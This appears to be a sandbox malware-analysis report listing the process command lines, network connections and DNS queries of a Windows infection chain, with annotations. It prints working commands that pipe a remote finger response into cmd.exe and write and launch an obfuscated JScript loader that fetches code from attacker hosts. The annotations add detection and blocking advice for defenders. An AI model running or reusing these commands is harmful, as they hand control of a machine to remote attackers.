Technical Information
- '<SYSTEM32>\finger.exe' ok@gwa19dvui8t.amalicalo.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\xqh.js"
- %LOCALAPPDATA%\xqh.js
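- 'gw######i8t.amalicalo.xyz':79
- '9d######os5.bessateron.buzz':80
- 'cl###flare.com':443
- 'microsoft.com':80
  (Note: the masked hostnames correspond to the full names visible in the command lines of this report: gwa19dvui8t.amalicalo.xyz, contacted on port 79, the Finger service port, and 9dn1maaeos5.bessateron.buzz, contacted on port 80. 'microsoft.com', and presumably the masked 'cl###flare.com' entry, are widely used legitimate domains and are not useful as indicators on their own.)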
- 'gw######i8t.amalicalo.xyz':79
- 'cl###flare.com':443
- DNS ASK gw######i8t.amalicalo.xyz
- DNS ASK 9d######os5.bessateron.buzz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
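- '<SYSTEM32>\cmd.exe' /c finger ok@gwa19dvui8t.amalicalo.xyz |more +2 |cmd
  (Note: the remote host's Finger response is piped through 'more +2', which skips the leading lines of the output, and the remainder is fed to a new cmd.exe as commands, so the text that gets executed is controlled by the remote server. finger.exe is rarely used on current Windows systems. A cmd.exe launch of finger.exe followed by an outbound connection to TCP port 79 is therefore a strong detection signal, and outbound port 79 can usually be blocked at the egress firewall.)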
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt TMQI=.j&&SEt VUGAT=vqoCSarqoCS a =qoCS 'scqoCSriqoCSptqoCS:'; b =qoCS 'hqoCSTtPqoCS:'; GqoCSetqoCSObjqoCSecqoCSt(qoCSa+b+'&&sET XR6M=LMKGALMKGA9dn1maaeos5.bessateron.buzzLMKGA?1LMKG...
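- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p V967M="%VUGAT:qoCS=%%XR6M:LMKGA=/%" 0<nul 1>%LOCALAPPDATA%\xqh%TMQI%s"
  (Note: the preceding command sets TMQI to '.j', so 'xqh%TMQI%s' expands to xqh.js. The substitution %VUGAT:qoCS=% deletes the filler token 'qoCS' and %XR6M:LMKGA=/% turns 'LMKGA' into '/'. 'set /p' with input from nul and redirected output then writes the resulting text to %LOCALAPPDATA%\xqh.js. The de-obfuscated text begins "var a = 'script:'; b = 'hTtP:'; GetObject(a+b+'" followed by //9dn1maaeos5.bessateron.buzz/?1..., so the dropped script loads further content from that host over HTTP; the rest of the command is truncated in this listing. For detection, process command-line logging shows cmd.exe started with /V and 'set' variables using substring substitution, followed by wscript.exe running a .js file from %LOCALAPPDATA%.)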
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\xqh%TMQI%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\xqh.js